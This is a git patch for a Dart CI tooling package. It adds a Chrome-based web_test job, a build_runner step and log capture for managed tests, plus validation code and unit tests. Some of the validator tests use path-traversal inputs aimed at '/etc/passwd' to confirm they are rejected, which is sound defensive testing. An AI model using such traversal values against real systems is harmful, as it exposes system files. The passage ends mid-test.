From d6f11ac99c5f005888a472a0ab991284bb73c8fa Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 17:12:42 -0500 Subject: [PATCH 01/16] feat: add web_test feature, build_runner support, and enhanced managed test - Add `web_test` CI feature: standalone ubuntu job with deterministic Chrome provisioning via browser-actions/setup-chrome@v2, configurable concurrency and optional test path filtering - Enable `build_runner` feature: runs `dart run build_runner build --delete-conflicting-outputs` before analyze/test steps to regenerate .g.dart codegen files - Enhance managed test: pipe test output through tee for log capture, use PIPESTATUS for correct exit codes, upload test logs as artifacts - Add web_test validation (concurrency bounds, path traversal/injection safety checks) with 16 new tests - Document build_runner and web_test features in SETUP.md and USAGE.md - Regenerate CI workflow with all new features Co-Authored-By: Claude Opus 4.6 --- .github/workflows/ci.yaml | 25 +- .runtime_ci/config.json | 3 +- .runtime_ci/template_versions.json | 8 +- SETUP.md | 4 + USAGE.md | 5 + lib/src/cli/manage_cicd.dart | 361 +++++++++++++++++--- lib/src/cli/utils/workflow_generator.dart | 103 ++++++ templates/config.json | 8 +- templates/github/workflows/ci.skeleton.yaml | 128 ++++++- test/workflow_generator_test.dart | 161 ++++++++- 10 files changed, 744 insertions(+), 62 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 480042a..40038b3 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -119,6 +119,9 @@ jobs: env: GIT_LFS_SKIP_SMUDGE: "1" + - name: Run build_runner + run: dart run build_runner build --delete-conflicting-outputs + # ── shared:analysis-cache ── keep in sync with single_platform ── # ── shared:proto-verify ── keep in sync with single_platform ── # ── shared:analyze ── keep in sync with single_platform ── @@ -176,25 +179,35 @@ jobs: env: GIT_LFS_SKIP_SMUDGE: "1" + - name: Run build_runner + run: dart run build_runner build --delete-conflicting-outputs + # --- BEGIN USER: pre-test --- # --- END USER: pre-test --- # ── shared:test ── keep in sync with single_platform ── - name: Test - run: dart test + shell: bash + run: | + set -o pipefail + mkdir -p "$RUNNER_TEMP/test-logs" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + exit ${PIPESTATUS[0]} + env: + TEST_LOG_DIR: ${{ runner.temp }}/test-logs - - name: Upload test artifacts on failure - if: failure() + - name: Upload test logs + if: always() uses: actions/upload-artifact@v4 with: - name: test-artifacts-${{ matrix.platform_id }} + name: test-logs-${{ matrix.platform_id }} path: | + ${{ runner.temp }}/test-logs/ test/integration/fixtures/bin/ **/test-results/ - retention-days: 7 + retention-days: 14 # --- BEGIN USER: post-test --- # --- END USER: post-test --- - # --- BEGIN USER: extra-jobs --- # --- END USER: extra-jobs --- diff --git a/.runtime_ci/config.json b/.runtime_ci/config.json index 19e1c65..2251e38 100644 --- a/.runtime_ci/config.json +++ b/.runtime_ci/config.json @@ -73,7 +73,8 @@ "format_check": true, "analysis_cache": false, "managed_analyze": false, - "managed_test": false + "managed_test": true, + "build_runner": true }, "secrets": {}, "sub_packages": [], diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 5e662f9..4dd8bfe 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-24T20:52:23.005924Z", + "updated_at": "2026-02-24T22:08:51.110199Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,9 +23,9 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "fa46da42c95dd420ebcaa28847ef76e6c5f5e634d9b62ddcfa11da6f561fa1c9", - "consumer_hash": "23ff33976e549dc469e84717d71e5d5ee182999cc000baab85cb7276f3db27d7", - "updated_at": "2026-02-24T20:52:23.006744Z" + "hash": "65637b8a60124f7837b7c7b755ef718312054cac6307cf4cb3d646eccac02e6e", + "consumer_hash": "2b0dc631e68ad35000c358bb982f06a9ef5f7a9988581dcf994095ad47fd524d", + "updated_at": "2026-02-24T22:08:51.111054Z" }, "workflow_release": { "hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", diff --git a/SETUP.md b/SETUP.md index 0d99b41..1f15342 100644 --- a/SETUP.md +++ b/SETUP.md @@ -312,6 +312,10 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `features.analysis_cache` | bool | `false` | Cache analysis results across runs | | `features.managed_analyze` | bool | `false` | Run `dart analyze` via tooling | | `features.managed_test` | bool | `false` | Run `dart test` via tooling | +| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze/test | +| `features.web_test` | bool | `false` | Add a standalone `web-test` job that runs `dart test -p chrome` on Ubuntu | +| `web_test.concurrency` | int | `1` | Number of concurrent browser test suites | +| `web_test.paths` | list | `[]` | Specific test paths to run (empty = auto-discover all web-compatible tests) | | `platforms` | list | `["ubuntu"]` | Platform matrix. If 2+ entries, CI runs `analyze` once then `test` as a matrix. Valid: `ubuntu-x64`, `ubuntu-arm64`, `macos-arm64`, `macos-x64`, `windows-x64`, `windows-arm64` (plus aliases `ubuntu`, `macos`, `windows`). | | `runner_overrides` | object | `{}` | Override platform IDs to custom `runs-on` labels (e.g. org-managed GitHub-hosted runners). Example: `{ "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core" }` | | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | diff --git a/USAGE.md b/USAGE.md index bae4485..2190afa 100644 --- a/USAGE.md +++ b/USAGE.md @@ -1249,11 +1249,16 @@ final exists = await commandExists('git'); 4. **Multi-platform mode** (`ci.platforms` has 2+ entries): - `analyze` — Run analysis once (Ubuntu) - `test` — Run tests as a matrix across OS+arch (`x64` + `arm64`) +5. Optional `web-test` — If `ci.features.web_test=true`, runs `dart test -p chrome` in a standalone Ubuntu job with deterministic Chrome provisioning via `browser-actions/setup-chrome@v2` **Platform matrix configuration:** - `ci.platforms`: list of platform IDs (e.g. `["ubuntu-x64","ubuntu-arm64","macos-arm64","macos-x64","windows-x64","windows-arm64"]`) - `ci.runner_overrides`: optional map to point platform IDs at custom `runs-on` labels (e.g. org-managed GitHub-hosted runners) +**Optional features:** +- `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze and test steps to regenerate `.g.dart` codegen files +- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure concurrency and test paths via `ci.web_test.concurrency` (default `1`) and `ci.web_test.paths` (default `[]` = auto-discover) + **Key steps:** ```yaml - run: dart run runtime_ci_tooling:manage_cicd verify-protos diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index e77a8d3..8db2e7e 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2140,7 +2140,17 @@ ${_artifactLink()} '''); } -/// Run dart test. +/// Run dart test with full output capture (two-layer strategy). +/// +/// Layer 1 — Zone-aware reporters: `--file-reporter json:` captures all +/// `print()` calls as `PrintEvent` objects with test attribution, and +/// `--file-reporter expanded:` captures human-readable output. +/// +/// Layer 2 — Shell-level `tee` (configured in CI template) captures anything +/// that bypasses Dart zones (`stdout.write()`, isolate prints, FFI output). +/// +/// All log files are written to [logDir] (`$TEST_LOG_DIR` in CI, or +/// `/.dart_tool/test-logs/` locally). Future _runTest(String repoRoot) async { _header('Running Tests'); @@ -2148,62 +2158,323 @@ Future _runTest(String repoRoot) async { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { _success('No test/ directory found — skipping tests'); - _writeStepSummary(''' -## Test Results - -**No test/ directory found — skipped.** -'''); + _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); return; } - final result = await Process.run('dart', ['test', '--exclude-tags', 'gcp'], workingDirectory: repoRoot); - final output = result.stdout as String; - stdout.write(output); - stderr.write(result.stderr); - // Parse test output for summary (before potential exit) - final passMatch = RegExp(r'(\d+) tests? passed').firstMatch(output); - final failMatch = RegExp(r'(\d+) failed').firstMatch(output); - final skipMatch = RegExp(r'(\d+) skipped').firstMatch(output); - final passed = passMatch?.group(1) ?? '?'; - final failed = failMatch?.group(1) ?? '0'; - final skipped = skipMatch?.group(1) ?? '0'; - - // Truncate output for collapsible (keep last 5000 chars if huge) - final testOutputPreview = output.length > 5000 - ? '... (truncated)\n${output.substring(output.length - 5000)}' - : output; + // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + Directory(logDir).createSync(recursive: true); + + final jsonPath = '$logDir/results.json'; + final expandedPath = '$logDir/expanded.txt'; + + // Build test arguments with two file reporters + expanded console output + final testArgs = [ + 'test', + '--exclude-tags', + 'gcp', + '--chain-stack-traces', + '--reporter', + 'expanded', + '--file-reporter', + 'json:$jsonPath', + '--file-reporter', + 'expanded:$expandedPath', + ]; - if (result.exitCode != 0) { - _error('Tests failed (exit code ${result.exitCode})'); - // Write failure summary BEFORE exiting - _writeStepSummary(''' -## Test Results -- FAILED + _info('Log directory: $logDir'); + _info('Running: dart ${testArgs.join(' ')}'); + + // Use Process.start with piped output so we can both stream to console + // AND capture the full output for summary generation. + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + + // Stream stdout and stderr to console in real-time while capturing + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + + final stdoutDone = process.stdout.transform(const SystemEncoding().decoder).listen((data) { + stdout.write(data); + stdoutBuf.write(data); + }).asFuture(); + + final stderrDone = process.stderr.transform(const SystemEncoding().decoder).listen((data) { + stderr.write(data); + stderrBuf.write(data); + }).asFuture(); + + // Wait for streams to drain and process to exit (45-min safety timeout) + const processTimeout = Duration(minutes: 45); + final exitCode = await process.exitCode.timeout( + processTimeout, + onTimeout: () { + _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + process.kill(ProcessSignal.sigkill); + return -1; + }, + ); + try { + await Future.wait([stdoutDone, stderrDone]); + } catch (_) { + // Ignore stream errors (e.g. process killed before streams drained) + } -| Metric | Count | -|--------|-------| -| Passed | $passed | -| Failed | **$failed** | -| Skipped | $skipped | + // Parse the JSON results file for structured test data + final results = _parseTestResultsJson(jsonPath); -${_collapsible('Test Output', '```\n$testOutputPreview\n```', open: true)} -'''); - exit(result.exitCode); + // Write console output to log file as well (supplements shell-level tee) + File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + } + + // Generate and write the rich job summary + _writeTestJobSummary(results, exitCode, logDir); + + if (exitCode != 0) { + _error('Tests failed (exit code $exitCode)'); + exit(exitCode); } _success('All tests passed'); +} - _writeStepSummary(''' -## Test Results +/// A single test failure with its error, stack trace, and captured print output. +class _TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + _TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} -| Metric | Count | -|--------|-------| -| Passed | **$passed** | -| Failed | $failed | -| Skipped | $skipped | +/// Parsed results from the NDJSON test results file. +class _TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List<_TestFailure> failures = []; + bool parsed = false; +} -**All tests passed.** +/// Parse the NDJSON file produced by `--file-reporter json:`. +/// +/// Each line is a JSON object with a `type` field. We track: +/// - `testStart`: register test name, start time, skip status +/// - `testDone`: record result, compute duration +/// - `error`: capture error message + stack trace +/// - `print`: capture print output, attribute to testID +/// - `done`: overall success/failure + total time +_TestResults _parseTestResultsJson(String jsonPath) { + final results = _TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + _warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + // Tracking maps keyed by testID + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + final skippedTests = {}; -${_collapsible('Test Output', '```\n$testOutputPreview\n```')} -'''); + try { + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test != null) { + final id = test['id'] as int; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + // Detect group-level "loading" entries (no real test) + final metadata = test['metadata'] as Map?; + if (metadata != null && metadata['skip'] == true) { + skippedTests[id] = true; + } + } + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + // Skip synthetic/hidden entries (group-level loading events) + if (hidden) break; + + if (skipped || skippedTests[id] == true) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + _TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id] ?? '', + stackTrace: testStackTraces[id] ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + testErrors[id] = event['error'] as String? ?? ''; + testStackTraces[id] = event['stackTrace'] as String? ?? ''; + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } + } catch (e) { + _warn('Failed to parse JSON results: $e'); + } + + return results; +} + +/// Generate a rich GitHub Actions job summary from parsed test results. +void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { + final buf = StringBuffer(); + + // Determine platform identifier for the heading + final platformId = + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; + + buf.writeln('## Test Results — $platformId\n'); + + if (!results.parsed) { + // Fallback: no JSON file was produced (test binary crashed before writing) + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.\n'); + buf.writeln('Check the expanded output in test logs for details.\n'); + buf.writeln(_artifactLink(':package: View full test logs')); + _writeStepSummary(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + // Status banner + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s\n'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed\n'); + } + + // Summary table + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + // Failed test details + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests\n'); + + // Cap at 20 failures to avoid exceeding the 1 MiB summary limit + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${_escapeHtml(f.name)}$durStr\n'); + + if (f.error.isNotEmpty) { + // Truncate very long error messages + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + buf.writeln('```'); + buf.writeln(error); + buf.writeln('```\n'); + } + + if (f.stackTrace.isNotEmpty) { + // Truncate very long stack traces + final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; + buf.writeln('**Stack Trace:**'); + buf.writeln('```'); + buf.writeln(stack); + buf.writeln('```\n'); + } + + if (f.printOutput.isNotEmpty) { + final printLines = f.printOutput.split('\n'); + final lineCount = printLines.length; + // Truncate captured output if it's very long + final printPreview = f.printOutput.length > 1500 + ? '${f.printOutput.substring(0, 1500)}\n... (truncated)' + : f.printOutput.trimRight(); + buf.writeln('**Captured Output ($lineCount lines):**'); + buf.writeln('```'); + buf.writeln(printPreview); + buf.writeln('```\n'); + } + + buf.writeln('
\n'); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. ' + 'See test logs artifact for full details._\n', + ); + } + } + + // Artifact link + buf.writeln('---'); + buf.writeln(_artifactLink(':package: View full test logs')); + buf.writeln(); + + _writeStepSummary(buf.toString()); +} + +/// Escape HTML special characters for safe embedding in GitHub markdown. +String _escapeHtml(String input) { + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>'); } /// Run dart analyze and fail only on actual errors. diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 952bb61..a39def2 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -52,6 +52,7 @@ const Set _knownFeatureKeys = { 'managed_analyze', 'managed_test', 'build_runner', + 'web_test', }; /// Renders CI workflow YAML from a Mustache skeleton template and config.json. @@ -177,6 +178,12 @@ class WorkflowGenerator { 'managed_analyze': features['managed_analyze'] == true, 'managed_test': features['managed_test'] == true, 'build_runner': features['build_runner'] == true, + 'web_test': features['web_test'] == true, + + // Web test config (only meaningful when web_test is true) + 'web_test_concurrency': _resolveWebTestConcurrency(ciConfig), + 'web_test_paths': _resolveWebTestPaths(ciConfig), + 'web_test_has_paths': _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -197,6 +204,39 @@ class WorkflowGenerator { }; } + static String _resolveWebTestConcurrency(Map ciConfig) { + final webTestConfig = ciConfig['web_test']; + if (webTestConfig is Map) { + final concurrency = webTestConfig['concurrency']; + if (concurrency is int && concurrency > 0) { + return '$concurrency'; + } + } + return '1'; + } + + static String _resolveWebTestPaths(Map ciConfig) { + final webTestConfig = ciConfig['web_test']; + if (webTestConfig is Map) { + final paths = webTestConfig['paths']; + if (paths is List && paths.isNotEmpty) { + return paths.whereType().where((s) => s.trim().isNotEmpty).join(' '); + } + } + return ''; + } + + static bool _resolveWebTestHasPaths(Map ciConfig) { + final webTestConfig = ciConfig['web_test']; + if (webTestConfig is Map) { + final paths = webTestConfig['paths']; + if (paths is List && paths.isNotEmpty) { + return paths.whereType().where((s) => s.trim().isNotEmpty).isNotEmpty; + } + } + return false; + } + /// Extract user sections from the existing file and re-insert them /// into the rendered output. /// @@ -391,6 +431,62 @@ class WorkflowGenerator { } } } + + final webTestConfig = ciConfig['web_test']; + if (webTestConfig != null) { + if (webTestConfig is! Map) { + errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); + } else { + final concurrency = webTestConfig['concurrency']; + if (concurrency != null) { + if (concurrency is! int) { + errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); + } else if (concurrency < 1) { + errors.add('ci.web_test.concurrency must be a positive integer, got $concurrency'); + } + } + + final paths = webTestConfig['paths']; + if (paths != null) { + if (paths is! List) { + errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); + } else { + for (var i = 0; i < paths.length; i++) { + final pathValue = paths[i]; + if (pathValue is! String || pathValue.trim().isEmpty) { + errors.add('ci.web_test.paths[$i] must be a non-empty string'); + continue; + } + if (pathValue != pathValue.trim()) { + errors.add('ci.web_test.paths[$i] must not have leading/trailing whitespace'); + continue; + } + if (pathValue.contains(RegExp(r'[\r\n\t]'))) { + errors.add('ci.web_test.paths[$i] must not contain newlines/tabs'); + continue; + } + if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { + errors.add('ci.web_test.paths[$i] must be a relative repo path'); + continue; + } + if (pathValue.contains('\\')) { + errors.add('ci.web_test.paths[$i] must use forward slashes (/)'); + continue; + } + final normalized = p.posix.normalize(pathValue); + if (normalized.startsWith('..') || normalized.contains('/../')) { + errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); + continue; + } + if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { + errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); + } + } + } + } + } + } + return errors; } @@ -413,6 +509,13 @@ class WorkflowGenerator { Logger.info(' Features: (none)'); } + if (features['web_test'] == true) { + final webTestConfig = ciConfig['web_test'] as Map? ?? {}; + final concurrency = webTestConfig['concurrency'] ?? 1; + final webPaths = webTestConfig['paths'] as List? ?? []; + Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}'); + } + if (secrets.isNotEmpty) { Logger.info(' Secrets: ${secrets.length} env var(s)'); } diff --git a/templates/config.json b/templates/config.json index 0a971cb..5fa7efc 100644 --- a/templates/config.json +++ b/templates/config.json @@ -73,10 +73,16 @@ "analysis_cache": false, "managed_analyze": false, "managed_test": false, - "build_runner": false + "build_runner": false, + "web_test": false }, "secrets": {}, "sub_packages": [], + "_comment_web_test": "Optional: web_test runs 'dart test -p chrome' in a standalone ubuntu job. Requires 'web_test: true' in features.", + "web_test": { + "concurrency": 1, + "paths": [] + }, "_comment_platforms": "Optional: CI platform matrix. When 2+ entries are provided, CI splits into analyze + matrix test jobs.", "platforms": ["ubuntu-x64", "ubuntu-arm64", "macos-arm64", "macos-x64", "windows-x64", "windows-arm64"], "_comment_runner_overrides": "Optional: override platform IDs to custom runs-on labels (e.g. org-managed GitHub-hosted runners). Keys must match ci.platforms entries.", diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index edcb908..b5af516 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -196,12 +196,29 @@ jobs: # ── shared:test ── keep in sync with multi_platform ── <%#managed_test%> - name: Test - run: dart run runtime_ci_tooling:manage_cicd test + shell: bash + run: | + set -o pipefail + mkdir -p "$RUNNER_TEMP/test-logs" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + exit ${PIPESTATUS[0]} + env: + TEST_LOG_DIR: ${{ runner.temp }}/test-logs + + - name: Upload test logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: test-logs-<%runner%> + path: | + ${{ runner.temp }}/test-logs/ + test/integration/fixtures/bin/ + **/test-results/ + retention-days: 14 <%/managed_test%> <%^managed_test%> - name: Test run: dart test -<%/managed_test%> - name: Upload test artifacts on failure if: failure() @@ -212,6 +229,7 @@ jobs: test/integration/fixtures/bin/ **/test-results/ retention-days: 7 +<%/managed_test%> # --- BEGIN USER: post-test --- # --- END USER: post-test --- @@ -393,12 +411,29 @@ jobs: # ── shared:test ── keep in sync with single_platform ── <%#managed_test%> - name: Test - run: dart run runtime_ci_tooling:manage_cicd test + shell: bash + run: | + set -o pipefail + mkdir -p "$RUNNER_TEMP/test-logs" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + exit ${PIPESTATUS[0]} + env: + TEST_LOG_DIR: ${{ runner.temp }}/test-logs + + - name: Upload test logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: test-logs-${{ matrix.platform_id }} + path: | + ${{ runner.temp }}/test-logs/ + test/integration/fixtures/bin/ + **/test-results/ + retention-days: 14 <%/managed_test%> <%^managed_test%> - name: Test run: dart test -<%/managed_test%> - name: Upload test artifacts on failure if: failure() @@ -409,10 +444,95 @@ jobs: test/integration/fixtures/bin/ **/test-results/ retention-days: 7 +<%/managed_test%> # --- BEGIN USER: post-test --- # --- END USER: post-test --- <%/multi_platform%> +<%#web_test%> + web-test: + needs: [pre-check<%#format_check%>, auto-format<%/format_check%>] + if: needs.pre-check.outputs.should_run == 'true' + runs-on: ubuntu-latest +<%#has_secrets%> + env: +<%#secrets_list%> + <%env_name%>: ${{ secrets.<%secret_name%> }} +<%/secrets_list%> +<%/has_secrets%> + steps: + - uses: actions/checkout@v6.0.2 + with: +<%#format_check%> + ref: ${{ needs.auto-format.outputs.sha }} +<%/format_check%> + fetch-depth: 1 + persist-credentials: false +<%#lfs%> + lfs: true +<%/lfs%> + + - name: Configure Git for HTTPS with Token + shell: bash + run: | + TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" + echo "::add-mask::${TOKEN}" + git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + + - uses: dart-lang/setup-dart@v1.7.1 + with: + sdk: "<%dart_sdk%>" + + - name: Cache Dart pub dependencies + uses: actions/cache@v5.0.3 + with: + path: ~/.pub-cache + key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} + restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + + - run: dart pub get + env: + GIT_LFS_SKIP_SMUDGE: "1" + +<%#build_runner%> + - name: Run build_runner + run: dart run build_runner build --delete-conflicting-outputs + +<%/build_runner%> + - name: Setup Chrome + id: setup-chrome + uses: browser-actions/setup-chrome@v2 + with: + install-dependencies: true + + - name: Verify Chrome + run: ${{ steps.setup-chrome.outputs.chrome-path }} --version + +<%#web_test_has_paths%> + - name: Web Test + run: dart test -p chrome --concurrency=<%web_test_concurrency%> <%web_test_paths%> + env: + CHROME_EXECUTABLE: ${{ steps.setup-chrome.outputs.chrome-path }} +<%/web_test_has_paths%> +<%^web_test_has_paths%> + - name: Web Test + run: dart test -p chrome --concurrency=<%web_test_concurrency%> + env: + CHROME_EXECUTABLE: ${{ steps.setup-chrome.outputs.chrome-path }} +<%/web_test_has_paths%> + + - name: Upload web test artifacts on failure + if: failure() + uses: actions/upload-artifact@v4 + with: + name: web-test-artifacts + path: | + **/test-results/ + retention-days: 7 +<%/web_test%> # --- BEGIN USER: extra-jobs --- # --- END USER: extra-jobs --- diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 0c95411..4161089 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -15,6 +15,7 @@ Map _validConfig({ dynamic lineLength, List? subPackages, Map? runnerOverrides, + Map? webTest, }) { return { 'dart_sdk': dartSdk, @@ -25,6 +26,7 @@ Map _validConfig({ if (lineLength != null) 'line_length': lineLength, if (subPackages != null) 'sub_packages': subPackages, if (runnerOverrides != null) 'runner_overrides': runnerOverrides, + if (webTest != null) 'web_test': webTest, }; } @@ -176,6 +178,7 @@ void main() { 'managed_analyze': true, 'managed_test': false, 'build_runner': true, + 'web_test': true, }, )); expect(errors.where((e) => e.contains('features')), isEmpty); @@ -496,11 +499,166 @@ void main() { }); }); + // ---- web_test ---- + group('web_test', () { + test('non-map web_test produces error', () { + final config = _validConfig(); + config['web_test'] = 'not_a_map'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }); + + test('null web_test is fine (optional)', () { + final errors = WorkflowGenerator.validate(_validConfig()); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('web_test.concurrency non-int produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 'fast'}), + ); + expect(errors, anyElement(contains('concurrency must be an integer'))); + }); + + test('web_test.concurrency zero produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 0}), + ); + expect(errors, anyElement(contains('positive integer'))); + }); + + test('web_test.concurrency negative produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': -1}), + ); + expect(errors, anyElement(contains('positive integer'))); + }); + + test('web_test.concurrency valid int passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 4}), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('web_test.concurrency null is fine (defaults to 1)', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {}), + ); + expect(errors.where((e) => e.contains('concurrency')), isEmpty); + }); + + test('web_test.paths non-list produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'paths': 'not_a_list'}), + ); + expect(errors, anyElement(contains('paths must be an array'))); + }); + + test('web_test.paths with empty string produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [''], + }), + ); + expect(errors, anyElement(contains('must be a non-empty string'))); + }); + + test('web_test.paths with absolute path produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['/etc/passwd'], + }), + ); + expect(errors, anyElement(contains('must be a relative repo path'))); + }); + + test('web_test.paths with traversal produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['../../../etc/passwd'], + }), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); + + test('web_test.paths with backslashes produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [r'test\web\foo_test.dart'], + }), + ); + expect(errors, 